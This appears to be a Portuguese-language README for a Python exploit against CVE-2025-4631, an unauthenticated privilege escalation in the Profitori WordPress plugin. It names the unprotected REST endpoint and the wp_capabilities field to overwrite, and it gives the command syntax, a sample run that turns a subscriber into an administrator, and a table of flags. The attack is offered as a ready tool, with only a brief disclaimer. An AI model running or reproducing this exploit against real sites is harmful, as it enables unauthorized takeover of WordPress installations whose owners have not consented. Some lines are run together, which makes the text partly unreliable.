
Profitori 2.0.6.0 - 2.1.1.3 - Autorização Ausente para Escalação de Privilégios Não Autenticada
O Plugin Profitori (versões 2.0.6.0 a 2.1.1.3) é vulnerável a escalação de privilégio não autenticada devido a uma verificação de capacidade ausente no endpoint /wp-json/stocktend/v1/stocktend_object. Isso permite que atacantes remotos escalem os privilégios de usuários existentes (ou criem novos) manipulando diretamente o campo meta wp_capabilities.
Este exploit em Python automatiza o processo de escalação de privilégio:
readme.txt.Se a verificação da versão falhar, o exploit prossegue com cautela e um aviso.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
| Flag | Descrição | Obrigatório |
|---|---|---|
-u, --url | 🌐 URL base do site WordPress | ✅ Sim |
-id | 🆔 ID do usuário a ser escalado | ✅ Sim |
--email | 📧 Email falso para exibir | ❌ Não |
--name | 👤 Nome de exibição | ❌ Não |
--url_field | 🔗 Campo de URL do usuário | ❌ Não |
--verbose | 🔍 Imprimir resposta JSON completa | ❌ Não |
requestsInstalar via:
pip install requests
Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizados. Qualquer uso indevido deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é estritamente proibido. O criador não se responsabiliza por quaisquer danos ou consequências legais decorrentes do uso inadequado.
POR: Nxploited ( Khaled_Alenazi )